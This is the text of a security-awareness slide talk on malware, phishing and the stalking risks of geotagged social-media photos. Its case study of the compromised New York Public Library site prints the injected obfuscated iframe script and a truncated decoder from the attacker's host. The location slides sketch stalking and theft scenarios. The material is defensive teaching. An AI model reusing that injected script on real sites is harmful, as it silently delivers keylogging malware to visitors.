550 likes | 706 Views
Malware, Big Hacks, and Stalking: Information Security at a Glance. Ben Jackson, Mayhemic Labs. Objectives. Become familiar with InfoSec Understand security threats Learn defensive measures Ultimately, shed some light on the activities behind the curtain.
E N D
Malware, Big Hacks, and Stalking: Information Security at a Glance Ben Jackson, Mayhemic Labs
Objectives Become familiar with InfoSec Understand security threats Learn defensive measures Ultimately, shed some light on the activities behind the curtain
InfoSec Defined “protecting information and information systems from unauthorized access, use, disclosure, disruption, modification or destruction” - Wikipedia
InfoSec defined • Confidentiality • You don’t want your data getting out • Integrity • You don’t want your data altered • Availability • You want to access your data
Seems simple, what’s the big deal? IT presence both inside and outside of “traditional roles” is constantly expanding People want information anytime and anywhere via an increasing number of different devices Increased reliance on technology also increases risk of exposure to attacks
Threats • Phishing • Attempting to steal sensitive information by masquerading as a trustworthy entity in an electronic communication • Primarily via spoofed e-mail and web sites • Increasingly, IM is the tool of choice • Pharming • Re-directing users to fraudulent web sites • DNS cache poisoning • Modified HOSTS file • Typo-Squatting
Threats • Viruses • “a piece of code that adds itself to other programs” (Spafford, 1988) • Cannot run independently - requires that its “host” program be run to activate it.
More Threats • Worms • “a program that can run by itself and can propagate a fully working version of itself to other machines.” (Spafford, 1988) • Uses up resources because it continually self-replicates itself Takes up storage and memory. • Not necessarily malicious
Even More Threats • Info Stealers • Surveillance software/spyware that records every keystroke into a hidden/encrypted log file • Log file is periodically transmitted to the attacker • Used to steal financial account numbers (Banks, eBay, PayPal, credit cards, etc.)
Guess what? More Threats • Spyware • Software used to track Internet activities, redirect browser to certain web sites • Sometimes also employs an Info Stealer
Malware? • Short for “Malicious Software” • Catch All Term • This is the preferred term to the other catch all “computer virus” • Every computer virus is malware, but not all malware is a computer virus.
Why would anyone want to attack me? • How many sensitive things do you do on your computer? • Personal • Banking • Online Auctions • Bill Payment • Work • Login Credentials • Employee Information • Other “Personally Identifiable Information”
I don’t have any of that… • Even if you don’t have sensitive information, you can still be used to attack others • What if I want to attack one of your friends who works at a target of mine? • Compromise your e-mail? • Pose as you on Facebook? • Attack him or her via Instant Messenger?
Have I been compromised? • “I’m not compromised!” • How are you sure? • Possible Warning signs: • Computer suddenly noticeably slower? • Mysterious failures in commonly used applications? • Unexpected Pop up windows? • Mysterious/Unexpected behavior?
How did I get compromised? • Sadly, it’s easy • All too common • Let’s walk though and example • New York Public Library • Website was compromised late-2008 • Used to distribute malware
Wait a minute… http://ga6.org/enypl/home.html
Obfuscation! <script type="text/javascript"> <!-- document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E')); //--> </script> Hidden in that webpage is: What’s that?
Obfuscation deobfuscated! <iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe> • What’s really there: • Hosted in Malaysia • This redirects user to: • “http[:]//meraxe.com/fsp1/index.php” • Also hosted in Malaysia • This all happens silently and invisibly! • What’s at meraxe.com…?
Game over <script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script> • At meraxe.com, we find: • Effects: • Something is silently downloaded and executed by your computer
What happened?!?! • What happened??? • Downloaded and executed a file (age.exe) • Added file c:\WINDOWS\system32\control.dll • Added several Registry entries • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger • Deleted itself
Pwnz0r3d! • Control.dll monitors data entered into forms in IE • Steals user’s login credentials for legitimate web sites • On-line banking, credit cards, eBay, Paypal, etc, etc • “Phones home” with stolen data
What have we learned? • The Lesson? • Constant vigilance is vital • A single “careless click” is all it takes • Simply viewing a web page can result in infection. • Bottom Line: • The web is a scary place.
Why don’t they call it “Computer Security?” • Computers are a common attack vector, but information is what everyone is after • How much Information do you generate on a daily basis? • More importantly, how can this be used against you?
Locational Privacy • “Locational privacy (also known as "location privacy") is the ability of an individual to move in public space with the expectation that under normal circumstances their location will not be systematically and secretly recorded for later use.” • Electronic Frontier Foundationhttp://www.eff.org/wp/locational-privacy
Threats to your Locational Privacy (From the EFF) • Monthly transit swipe-cards • Electronic tolling devices • Traffic Cameras • Mobile Telephones • Electronic swipe cards for doors • Services telling you when your friends are nearby • However… They did miss one…
GeoTags • Small bits of EXIF (Exchangeable image file format) data that encodes the latitude, longitude, altitude, and relative direction of where the photo was taken • A lot of phones have this turned on by default • Why? Someone thought it was a good idea, I guess • Already a bad idea if you’re taking photos for later publication, but what happens when you’re instantly publishing them?
Not an isolated incident • After research, we discovered that about 3% of photos posted to Twitter have Geo-Tags on them • Doesn’t sound like a lot, but how many photos are posted to Twitter each day?
What’s the big deal? • I want to steal something from your co-op’s network… • Thanks to your sharing habits I know • Where you live… • That you’re telecommuting today… • That you “check into” a Starbucks every day around 10AM… • Boy, lets hope you logged out of your VPN before you left!
Or how about… • What if I want something stored on your laptop? • Thanks to your sharing habits I know • That you “check into” a Panera Saturday afternoons • That your code repository for your personal project gets updated before your “check in” at your home • What happens if I sit at that Panera and poison their WiFi connection? • Or if I just take your laptop when you go for a refill?
Some other scenarios • Why do you and your attractive classmate both go to dinner the same fancy restaurant every Tuesday after work? • Doesn’t your significant other have Yoga that night? • Why are you in a coffee shop nowhere near your apartment every Friday night? • Isn’t that close to a local AA meeting?
But Wait! There’s More! • Stalking • OK, someone might not be stalking you, but what about your friends? • Can I establish a pattern of their behavior from information you post? • Surveillance • People love routines, why did you break yours?
Some Stats… • Trawler averages around 15GB of downloads per day. • 35000 Tweets scanned • 20000 Pictures reaped • Probably around 4 million photos since we started the project • Honestly, we stopped counting • 120000 photos found
Join InfoSec: Fame and Fortune can be yours! • Apparently when you say you’re stalking everyone on Twitter, people notice. • NY Times, BBC, ABC News, Today Show, Toronto Star, CNET to name a few… • You also get your ISP banned from using TwitPic • Whoops!
Protecting Yourself • Patch, Patch, Patch! • Use auto-update whenever possible • Patch Everything • Adobe is a favorite target of attackers right now. Flash and Acrobat especially. • Use both Anti-Virus and Anti-Malware Software • Update every day
Protecting Yourself (cont.) • Practice “Safe Internet” • Don’t click links you don’t know • Don’t open unexpected e-Mail attachments • Don’t Download from Questionable Sites (esp. Freeware) • Don’t use Peer-to-Peer software
Protecting Yourself (cont.) • Beware Wireless Routers/Access Points: • At home… • Change default password and default SSID • Enable “WPA2” encryption • Enable and use MAC filtering • And on the road… • Who’s watching your traffic at Starbucks?
Protecting Yourself (cont.) • Don’t save user IDs and passwords on your hard drive • Use a separate computer for “sensitive” transactions • Banking • Paying bills • Credit Cards • …and nothing else